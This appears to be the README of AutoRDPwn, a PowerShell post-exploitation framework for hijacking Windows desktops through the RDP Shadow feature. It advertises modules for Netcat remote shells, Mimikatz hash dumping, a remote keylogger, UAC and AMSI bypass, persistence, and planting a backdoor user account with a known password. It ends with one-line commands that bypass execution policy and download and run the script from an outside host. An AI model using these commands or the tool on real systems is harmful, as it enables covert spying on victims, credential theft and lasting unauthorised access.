AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim’s desktop without his consent, and even control it on demand, using tools native to the operating system itself.
Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this, Through a completely intuitive menu in seven different languages.
Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.
Powershell 4.0 or higher
- New logo completely redesigned from scratch
- Full translation in 7 languages: es, en, fr, de, it, ru, pt
- Remote execution through a reverse shell with UAC and AMSI Bypass
- Partial support from Linux (more information in the user guide)
- Improved remote execution (internet connection is no longer necessary on the victim)
- New section available: Backdoors and persistence
- New module available: Remote Keylogger
- New section available: Privilege escalation
- New module available: Obtain information from the operating system
- New module available: Search vulnerabilities with Sherlock
- New module available: Escalate privileges with PowerUp
- New section available: Other Modules
- New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file
This application can be used locally, remotely or to pivot between teams.
When used remotely in a reverse shell, it is necessary to use the following parameters:
- admin / -noadmin -> Depending on the permissions we have, we will use one or the other
- nogui -> This will avoid loading the menu and some colors, guaranteed its functionality
- lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
- option -> As with the menu, we can choose how to launch the attack
- shadow -> We will decide if we want to see or control the remote device
- createuser -> This parameter is optional, the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine
Local execution on one line:
powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1”
Example of remote execution on a line:
powershell -ep bypass “cd $ env: temp; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser”